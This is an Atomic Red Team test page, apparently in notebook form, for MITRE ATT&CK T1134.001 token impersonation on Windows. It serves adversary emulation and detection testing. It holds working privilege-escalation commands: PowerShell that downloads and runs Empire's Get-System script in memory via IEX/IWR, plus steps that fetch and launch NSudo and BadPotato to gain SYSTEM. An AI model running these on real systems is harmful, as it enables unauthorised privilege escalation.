# T1134.001 - Token Impersonation/Theft
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.

An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.

## Atomic Tests

### Atomic Test #1 - Named pipe client impersonationUses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).

Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
```

In [ ]:
Invoke-AtomicTest T1134.001 -TestNumbers 1

### Atomic Test #2 - `SeDebugPrivilege` token duplicationUses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
```

In [ ]:
Invoke-AtomicTest T1134.001 -TestNumbers 2

### Atomic Test #3 - Launch NSudo Executable
Launches the NSudo executable for a short period of time and then exits.
NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: NSudoLG.exe must exist in the specified path #{nsudo_path}

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1134.001\bin\NSudoLG.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "PathToAtomicsFolder\T1134.001\bin\NSudoLG.exe"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -Recurse -ErrorAction Ignore
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Recurse -ErrorAction Ignore

```

In [ ]:
Invoke-AtomicTest T1134.001 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Start-Process "PathToAtomicsFolder\T1134.001\bin\NSudoLG.exe" -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1134.001 -TestNumbers 3

### Atomic Test #4 - Bad Potato
https://github.com/BeichenDream/BadPotato
Privilege escalation using named pipe connections
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: BadPotato.exe must exist in the temp directory

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe" "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"

```

In [ ]:
Invoke-AtomicTest T1134.001 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cd "PathToAtomicsFolder\..\ExternalPayloads"
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1134.001 -TestNumbers 4

#### Cleanup: 
```powershell
taskkill /f /im notepad.exe
```

In [ ]:
Invoke-AtomicTest T1134.001 -TestNumbers 4 -Cleanup

## Detection
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the <code>runas</code> command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)

Analysts can also monitor for use of Windows APIs such as <code>DuplicateToken(Ex)</code>, <code> ImpersonateLoggedOnUser </code>, and <code> SetThreadToken </code> and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.